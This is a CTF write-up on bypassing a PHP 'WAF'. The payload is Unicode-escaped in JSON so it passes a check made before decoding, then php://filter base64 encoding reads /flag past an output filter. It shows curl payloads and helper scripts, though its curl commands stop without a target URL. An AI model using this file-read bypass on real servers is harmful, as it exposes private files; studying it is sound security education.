(Part of a series of writeups from Harekaze CTF 2019.)

The challenge text reads:

I made a strong WAF, so you definitely can’t read the flag!


We are given the source code, a link to the website, and a subtle hint.

$ tree
├── chall
│   ├── index.html
│   ├── pages
│   │   ├── about.html
│   │   └── lorem.html
│   └── query.php
├── Dockerfile
└── php.ini

2 directories, 6 files

The Dockerfile defines the environment the web app runs in, so it's worth looking at first.

FROM php:7.3-apache

COPY ./php.ini $PHP_INI_DIR/php.ini
COPY ./chall /var/www/html
RUN echo "HarekazeCTF{<redacted>}" > /flag


The RUN ... > /flag line tells us that the flag is in a file called flag at the root of the filesystem, a handy thing to know.

Clicking on the link reveals a beautiful modern design.


JavaScript on index.html intercepts clicks on the About and Lorem Ipsum links and sends a JSON POST request to query.php, asking for the page named in the link's fragment (the part of the URL after #).

window.addEventListener('DOMContentLoaded', () => {
  let content = document.getElementById('content');
  for (let link of document.getElementsByClassName('link')) {
    link.addEventListener('click', () => {
      // Ask query.php for the page named after the '#' in the link
      fetch('query.php', {
        'method': 'POST',
        'headers': {
          'Content-Type': 'application/json'
        },
        'body': JSON.stringify({
          'page': link.href.split('#')[1]
        })
      }).then(resp => resp.json()).then(resp => {
        content.innerHTML = resp.content;
      });
      return false;
    }, false);
  }
}, false);

On the server side, query.php handles the request and serves the response with a suspicious-looking call to file_get_contents.


<?php
if (isset($_GET['source'])) {
  // ...
}

function is_valid($str) {
  $banword = [
    // no path traversal
    // ...
    // no stream wrapper
    // ...
    // no data exfiltration
    // ...
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

$body = file_get_contents('php://input');
$json = json_decode($body, true);

if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }
} else {
  $content = '<p>invalid request</p>';
}

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i',
    'HarekazeCTF{&lt;censored&gt;}', $content);
echo json_encode(['content' => $content]);

PHP has a habit of doing too much at once, which leads innocent-looking code to do something unexpected. PHP's stream, protocol, and fopen wrappers are frequent culprits. As a rule of thumb, if untrusted input can find its way into file_get_contents, you are probably in trouble.

Despite the author's attempts to mitigate path traversal and data exfiltration, they've made some fatal errors that will ultimately lead us to steal the flag.

Our eyes are drawn to the following sloppiness.

$body = file_get_contents('php://input');
$json = json_decode($body, true);

if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  // ...

The issue here is premature validation. The is_valid function is applied to $body before it goes through json_decode, not afterwards.

JSON decoding processes escape sequences, so if we use escape sequences to obfuscate the input, the validation is bypassed without affecting the final (decoded) string.
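To make the ordering problem concrete, here is a small JavaScript model of the server-side check. It is a sketch, not the challenge code: JSON.parse stands in for PHP's json_decode (both decode \uXXXX escapes as the JSON spec requires), serverSidePage is a hypothetical helper, and because the real banword list isn't shown, the /flag/i pattern is an assumption.

```javascript
// ASSUMPTION: stand-in for the elided banword list; we only assume that
// "flag" is one of the banned patterns.
const BANWORD = /flag/i;

// Mirrors is_valid(): reject the string if a banned pattern appears.
function isValid(str) {
  return !BANWORD.test(str);
}

// Hypothetical model of query.php: validate the raw body, THEN decode it.
function serverSidePage(body) {
  if (!isValid(body)) return null; // validation sees only the raw text
  return JSON.parse(body).page;    // decoding happens afterwards
}

const plainBody = '{"page":"/flag"}';
const escapedBody = '{"page":"\\u002F\\u0066\\u006C\\u0061\\u0067"}';

console.log(serverSidePage(plainBody));   // prints null
console.log(serverSidePage(escapedBody)); // prints /flag
```

The escaped body never contains the literal word, so the check passes, yet decoding still yields exactly the path we wanted.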

Let's look at the JSON specification's definition for a string.

JSON supports Unicode escapes of the form \uXXXX, where XXXX is four hex digits encoding a UTF-16 code unit; for ASCII characters, that is simply the character's code point.

For example, the letter A is 0x41, so it can be represented as \u0041.

$ echo '{ "page": "\u0041\u0041\u0041\u0041" }' | jq
{
  "page": "AAAA"
}

The tool uni2ascii can convert ASCII text into Unicode escapes.

$ echo '/flag' | uni2ascii -qpa L
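If uni2ascii isn't installed, the same escaping takes a few lines of JavaScript. toUnicodeEscapes is a hypothetical helper, not a library function; unlike the echo above, its input carries no trailing newline.

```javascript
// Escape every UTF-16 code unit of `text` as a JSON \uXXXX sequence with
// four uppercase hex digits, e.g. "A" -> "\u0041".
function toUnicodeEscapes(text) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    // charCodeAt gives a UTF-16 code unit (0..0xFFFF), which is exactly what
    // one \uXXXX escape encodes; non-BMP characters become surrogate pairs.
    const hex = text.charCodeAt(i).toString(16).toUpperCase().padStart(4, "0");
    out += "\\u" + hex;
  }
  return out;
}

console.log(toUnicodeEscapes("/flag")); // \u002F\u0066\u006C\u0061\u0067
```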


Armed with our obfuscated payload, all that's left to do is POST off the request to read /flag, and we should be done.

$ curl -X POST \
    -d "{\"page\":\"\u002F\u0066\u006C\u0061\u0067\"}" \
    -H 'Content-Type: application/json' \
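If you'd rather script the request than use curl, one subtlety matters: the body must be assembled by hand. Running JSON.stringify over an already-escaped payload doubles every backslash, so the server would decode the literal text \u002F... rather than /flag. A minimal Node.js sketch, assuming Node 18+ for the global fetch; buildRawBody and sendQuery are hypothetical names, and the query.php URL is left as a parameter.

```javascript
// Build the raw request body by hand so the \uXXXX escapes reach the
// server untouched (JSON.stringify would turn each "\" into "\\").
function buildRawBody(escapedPage) {
  return '{"page":"' + escapedPage + '"}';
}

// POST the body to query.php and return the "content" field of the reply.
// ASSUMPTION: Node 18+ (global fetch); `url` is the challenge's query.php.
async function sendQuery(url, escapedPage) {
  const resp = await fetch(url, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: buildRawBody(escapedPage),
  });
  return (await resp.json()).content;
}

const escaped = "\\u002F\\u0066\\u006C\\u0061\\u0067";
console.log(buildRawBody(escaped));
// {"page":"\u002F\u0066\u006C\u0061\u0067"}
console.log(JSON.stringify({ page: escaped }));
// {"page":"\\u002F\\u0066\\u006C\\u0061\\u0067"}  (double-escaped: wrong)
```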


Oh, wait, there's that part of the code that filters the content on the way out.

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i',
    'HarekazeCTF{&lt;censored&gt;}', $content);
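For experimenting locally, the output filter translates almost directly into JavaScript. This is an approximation of PHP's preg_replace, not the server's code: the g flag mirrors preg_replace's default of replacing every match, and the sample flag is made up.

```javascript
// JavaScript approximation of the PHP output filter. The "g" flag matches
// preg_replace's default of replacing every occurrence; in both engines
// "." does not match a newline, so a match stays on one line.
function censor(content) {
  return content.replace(/HarekazeCTF\{.+\}/gi, "HarekazeCTF{&lt;censored&gt;}");
}

// Hypothetical flag file contents, for illustration only.
console.log(censor("HarekazeCTF{dummy_flag}\n"));
// HarekazeCTF{&lt;censored&gt;}
```

Reading /flag directly, even with a perfectly escaped request, therefore only ever returns the censored placeholder.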

As mentioned earlier, when untrusted input reaches file_get_contents, we can hand PHP a stream wrapper URL instead of a plain path, and wrappers can do surprising things that happen to help us.

A little bit of research revealed that there is a wrapper called php://filter that can not only read files, but also convert them to base64 strings!

php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read.


So, the final payload becomes:

php://filter/convert.base64-encode/resource=/flag


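When this is passed directly to file_get_contents, PHP reads /flag and returns its contents as a base64-encoded string. Base64 output contains no braces, so it can no longer match the HarekazeCTF\{.+\} pattern, and the final layer of protection is bypassed. As before, we send the payload as \uXXXX escapes so that the raw request body gets past is_valid.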
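The reason base64 gets past the filter is easy to check: the base64 alphabet (A-Z, a-z, 0-9, +, / and = padding) contains no braces, so encoded output can never match HarekazeCTF\{.+\}. A minimal Node.js sketch using Buffer, with a made-up flag standing in for the real /flag contents.

```javascript
// Same pattern the PHP output filter uses.
const FLAG_PATTERN = /HarekazeCTF\{.+\}/i;

// Hypothetical /flag contents, for illustration only.
const flagFile = "HarekazeCTF{dummy_flag}\n";

// Standard base64, the same alphabet PHP's convert.base64-encode emits.
const encoded = Buffer.from(flagFile, "utf8").toString("base64");

console.log(FLAG_PATTERN.test(flagFile)); // true: would be censored
console.log(FLAG_PATTERN.test(encoded));  // false: base64 has no braces
console.log(Buffer.from(encoded, "base64").toString("utf8") === flagFile); // true
```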

$ curl -X POST \
     -d "{\"page\":\"\u0070\u0068\u0070\u003A\u002F\u002F\u0066\u0069\u006C\u0074\u0065\u0072\u002F\u0063\u006F\u006E\u0076\u0065\u0072\u0074\u002E\u0062\u0061\u0073\u0065\u0036\u0034\u002D\u0065\u006E\u0063\u006F\u0064\u0065\u002F\u0072\u0065\u0073\u006F\u0075\u0072\u0063\u0065\u003D\u002F\u0066\u006C\u0061\u0067\"}" \
     -H 'Content-Type: application/json' \


The response is base64 encoded.

$ echo 'SGFyZWthemVDVEZ7dHVydXRhcmFfdGF0dGF0dGFfcml0dGF9Cg==' | base64 -d
HarekazeCTF{turutara_tattatta_ritta}